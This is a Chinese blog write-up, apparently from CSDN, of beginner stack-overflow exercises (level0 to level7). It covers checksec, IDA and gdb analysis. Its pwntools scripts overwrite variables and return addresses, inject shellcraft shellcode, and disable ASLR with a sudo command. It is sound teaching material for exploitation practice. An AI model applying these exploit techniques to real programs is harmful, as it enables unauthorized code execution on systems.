linux 主进程栈溢出,[pwn] Linux栈溢出入门

最新推荐文章于 2024-05-16 21:11:40 发布
最新推荐文章于 2024-05-16 21:11:40 发布
阅读量121 收藏
点赞数
文章标签: linux 主进程栈溢出

做题入门=。=

菜呀,学习

level-0

aris教我checksec一下看是啥文件

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w592

32位的打开32位的ida

主程序

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w657

ebp是栈底指针 esp是栈顶指针

好奇为啥栈底指针在最高的地方

aris说是为了最大化利用空间(懵逼)

学习一下栈的知识

只要覆盖0x44个字节把 v5覆盖了就行

# coding=utf8

from pwn import *

context.log_level = 'debug'

context.terminal = ['gnome-terminal', '-x', 'bash', '-c']

payload = "A" * 0x44

cn.sendline(payload)

cn.readline()

gdb 调试一下

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image

可以看到已经被覆盖了

level-1

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w551

checksec 一下 发现是32位的

打开ida

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w674

只要把v5的值覆盖成1633837924就行了

转成16进制

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w407

0x61626364

用pwntools的时候会跳不出argc

aris说就跟sys.argv 一样需要给参数

看来只能手输入了

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w735

这里刚刚好覆盖到

换成61626364就好了

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w732

因为是小端的所以是反的

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w711

ok

level2

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w644

还是32位的一个

用ida打开

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w601

直接运行会这样

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w610

有一个getenv函数

是从系统环境中获得变量,问了一下aris

export这个命令就行

ch1p告诉我在ida里面可以用h将值变成16进制

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w210

只要把v5的值覆盖成0d0a0d0a之后就好了

小端所以是0a0d0a0d

import os

os.putenv('GREENIE','A'*0X40+'\x0a\x0d\x0a\x0d')

os.system('./level2')

运行一下成功了

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w389

level3

放到ida看一下

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w625

主函数

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w428

还有一个win函数

应该是把v5的值改成win的入口地址

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w531

看到win的入口地址是0x08048424

把v5的值改成这个就行

需要0x40个A+0x08048424

aris教我可以用hex来查看堆栈信息

使用回车可以看后面栈的内容

可以发现我已经将v5的值改掉了

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w829

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w343

成功

脚本:

#coding=utf8

from pwn import *

local = 1

if local:

cn = process('./level3')

payload = 'A'*0x40+p32(0x08048424)

cn.sendline(payload)

cn.interactive()

level4

打开ida

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w580

发现main函数只有这么点

还有一个win函数

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w463

还是要跳到这个函数

找到win函数的入口地址

看了一下s离ebp是0x40个字节

所以payload是'A'*0x40+'bbbb'+p32(0x08048424)

b是用来覆盖ebp 接下来就是返回地址

在测试的时候发现不行用gdb调试一下

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w730

发现并没有跳到我给的地址打印一下栈看一下

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w734

发现我的已经写上去了,但是地址还在后面8位

所以更改payload

A*0x48+'bbbb'+p32(0x08048424)

成功!

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w607

脚本:

#coding=utf8

from pwn import *

local = 1

if local:

cn = process('./level4')

payload = 'A'*0x48+'bbbb'+p32(0x08048424)

cn.sendline(payload)

cn.interactive()

解答

为啥往后移了8位静态分析的时候没啥问题

问了下aris

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w540

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w528

经过了与之后就比之前小了8就往后移了8位

23333

gdb是好东西

level5

打开ida

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w550

除了这个函数别的都没了

可以试着写shellcode了

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image

看一下pwntools自带的shellcode只有44长度

那个字符串s的长度有48所以写进去应该没啥问题

不过首先得把ASLR的保护给关了不然写不到那个地址上

sudo sh -c "echo 0 > /proc/sys/kernel/randomize_va_space"

用gdb调试一下

shellcode = asm(shellcraft.sh())

payload = shellcode+'A'*0x1C+p32(0x00000000)+p32(0xffffcf00)

cn.sendline(payload)

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w774

可以看到他已经被覆盖成功了,下一步就是shellcode

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w732

命令执行成功

level6

打开ida

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w596

main函数

看一下getpath函数

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w473

应该是从这里入手

发现不能像level5一样直接覆盖return的地址了

他做了限定前2位不能是ff

经过一天的学习=。=

通过空函数然后在return回来执行下一句return到shellcode就好了

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w788

找一个空函数 方便跳回来继续执行

就是你了0x0804850b

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w661

gdb调试一下

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w556

成功进去了

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w591

return到了我们的shellcode的位置

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w462

成功~

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w853

脚本:

shellcode = asm(shellcraft.sh())

payload = shellcode+'A'*0x20+p32(0x00000000)+p32(0x0804850b)+p32(0xffffceec)

cn.sendline(payload)

cn.interactive()

level7

还是和level6一样

只是getpath函数变了

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w421

就是多了一个strdup函数

上网查了一下他是从堆里面分配空间

感觉没啥用

跟上一题一样的思路找一下空函数

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w837

0x0804855b

然后写一下payload

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w731

shellcode = asm(shellcraft.sh())

payload = shellcode+'A'*0x20+p32(0x00000000)+p32(0x0804855b)+p32(0xffffceec)

# z('b*0x080484EF\nc')

cn.sendline(payload)

cn.interactive()

番外

当然有更屌的解法

1bf728fc3416?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

-w867

(等我学成归来)在学习一下

参考资料

weixin_39683858
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PWN基础知识及基础溢出手法
山高路远
04-12 3916
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
【七日打卡】Pwn溢出利用详解
阿道夫的博客
12-22 925
🖥是汇编语言中的一种数据结构,遵循LIFO(Last in Fist Out)原则,即后进先出。压(Push)、出(Pop)。📌注意:从高地址向低地址存储。
pwn(基础的溢出-上)
最新发布
2302_80935968的博客
05-16 778
编译器使用堆传递函数参数、保存返回地址、临时保存寄存器原有值(即函数调用的上下文)以备恢复以及存储本地局部变量的特点:后进先出的数据结构,的结构是从进程高地址向进程低地址生长这里说一下寄存器:寄存器是处理器加工数据或运行程序的重要载体,用于存放程序执行中用到的数据和指令。因此函数调用的实现与处理器寄存器组密切相关。最初的8086中寄存器是16位,每个都有特殊用途,寄存器名城反映其不同用途。由于IA32平台采用平面寻址模式,对特殊寄存器的需求大大降低,但由于历史原因,这些寄存器名称被保留下来。
PWN 溢出
u012173720的博客
11-21 973
Beginning 如果想用溢出来执行攻击指令,就要在溢出数据内包含攻击指令的内容或地址,并且要将程序控制权交给该指令。攻击指令可以是自定义的指令片段,也可以利用系统内已有的函数及指令 0x01 函数调用是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等。称之为“”是因为发生函数调用时,调用函数(caller)的状态被保存在内,被调用函数(ca...
linux 溢出
sky123博客
02-01 3743
基础知识 结构 函数调用过程 32位为例: KaTeX parse error: No such environment: align* at position 8: \begin{̲a̲l̲i̲g̲n̲*̲}̲ & \text{push a… 函数参数传递 32位程序 普通函数传参:参数基本都压在上(有寄存器传参的情况,可查阅相关资料)。 syscall传参:eax对应系统调用号,ebx、ecx、edx、esi、edi、ebp分别对应前六个参数多余的参数压在上。 64位程序: 普
PWN基础之函数调用溢出
weixin_46132162的博客
12-28 1394
在函数调用结束时,顶的函数(callee)状态被弹出,顶恢复到调用函数(caller)的状态函数调用在内存中从高地址向低地址生长,所以顶对应的内存地址在压时变小,退时变大。接下来vulnerable_function()函数会调用read()函数,这个时候vulnerable_function()函数为调函数(caller function)read()函数为被调函数(callee function)read()函数 是有参数的,我们来看一看有参数的函数在函数调用是什么样的。
Linux pwn入门教程(1)——溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——溢出基础
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\溢出基础\格式化字符串漏洞等
i 春秋月刊第六期:Linux pwn 零基础入门
10-23
i 春秋月刊第六期:Linux pwn 零基础入门
pwn溢出10道练习题有writeup
01-04
在这个场景中,"pwn溢出10道练习题有writeup" 提供了10个关于溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解溢出漏洞原理及其利用技术非常有帮助。 溢出是由于程序在上分配的内存不足,...
PWN入门迁移-附件资源
03-02
PWN入门迁移-附件资源
PWN 溢出基础【持续更新】
Luminous_song的博客
08-04 2271
溢出 基本 是一种先进后出的数据结构,要有PUSH和POP两种操作,都是对顶元素进行操作 内存中从高地址向低地址生长,高地址为父函数的帧 当一个函数执行完毕时,程序要回到调用指令的下一条指令(紧接call指令)处继续执行。函数调用过程通常使用堆实现,每个用户态进程对应一个调用结构(call stack)。编译器使用堆传递函数参数、保存返回地址、临时保存寄存器原有值(即函数调用的上下文)以备恢复以及存储本地局部变量 C语言函数调用 基础知识 以下知识点基于x86架构 EBP:帧基址指针寄
菜鸟PWN手进阶之溢出基础
re1wn
01-03 6836
菜鸟PWN手进阶之溢出基础
浅谈PWN基础-溢出
qq_45751349的博客
04-04 691
一、预备知识 缓冲区溢出简单介绍 缓冲区溢出:简单的说,缓冲区溢出就是超长的数据向小缓冲区复制,导致数据超出了小缓冲区,导致缓冲区其他的数据遭到破坏,这就是缓冲区溢出。而溢出是缓冲区溢出的一种,也是最常见的。只不过溢出发生在,堆溢出发生在堆,其实都是一样的。 二、简介 是一种计算机系统中的数据结构,它按照先进后出的原则存储数据,先进入的数据被压入底,最后的数据在顶,需要读数据的时...
PWN入门系列(2)溢出
小心信科理化声
12-02 1425
PWN入门系列(2) 溢出 溢出指的是程序向中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的中的变量的值被改变(覆盖)。是一种特定的缓冲区溢出漏洞,类似的还有heap、bss溢出等。其前提是: · 程序必须向上写入数据 程序对某个函数或者某个模块的输入数据的大小没有控制得当。 基本示例 举个简单的例子: #include <stdio.h> #include <string.h> void success() { puts("You Hava
溢出
Tianqinse的博客
08-18 3206
溢出概念: 溢出指的是程序向中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致中与其相邻的变量的值被改变。 溢出的原因: 局部数组过大。当函数内部的数组过大时,有可能导致堆溢出。局部变量是存储在中的,因此这个很好理解。解决这类问题的办法有两个,一是增大空间,二是改用动态分配,使用堆(heap)而不是(stack)。 递归调用层次太多。递归函数在运行时会执行压操作,当压次数太多时,也会导致堆溢出。 指针或数组越界。这种情况最常见,例如进行字符串拷贝,或处理用
溢出简述
MumuziD的博客
07-18 2451
作者:YoungChen__ 链接:https://www.jianshu.com/p/2104d11ee0a2 来源:简书 著作权归作者所有,任何形式的转载都请联系作者。 本文关于删除部分有些异议,可以看这个Counting Bloom Filter 的原理和实现 在进入正文之前,之前看到的有句话我觉得说得很好: Data structures are nothing different. They are like the bookshelves of your application where.
ctfshow PWN 溢出
08-23
在ctfshow PWN中,溢出是一种常见的攻击方式。 根据提供的引用,我了解到溢出是一种通过向程序输入过长的数据导致数据溢出的一种攻击手段。是一种数据结构,用于存储程序的局部变量和函数调用的返回地址等...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值